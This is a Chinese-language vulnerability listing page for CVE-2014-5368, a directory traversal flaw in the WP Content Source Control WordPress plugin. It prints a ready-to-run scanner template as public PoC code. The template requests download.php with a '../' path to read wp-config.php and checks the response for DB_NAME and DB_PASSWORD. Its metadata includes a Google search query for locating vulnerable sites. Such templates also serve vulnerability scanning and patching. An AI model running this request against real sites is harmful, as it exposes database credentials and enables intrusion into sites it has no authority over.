CVE-2014-5368: WordPress Plugin WP Content Source Control - Directory Traversal

日期: 2025-08-01 | 影响软件: WordPress Plugin WP Content Source Control | POC: 已公开

漏洞描述

A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.

PoC代码[已公开]

id: CVE-2014-5368

info:
  name: WordPress Plugin WP Content Source Control - Directory Traversal
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.
  remediation: |
    Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
    - https://www.exploit-db.com/exploits/39287
    - http://seclists.org/oss-sec/2014/q3/417
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/95374
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-5368
    cwe-id: CWE-22
    epss-score: 0.53297
    epss-percentile: 0.97903
    cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wp_content_source_control_project
    product: wp_content_source_control
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-source-control"
  tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022067c51e658fa87737776e5338bc511623b561191f0e23c6862f26e0d2d9101f1702203afb1be02fff84702a275fd86556d202a5f218d0e099cbf4b81e9396a3c4c6eb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐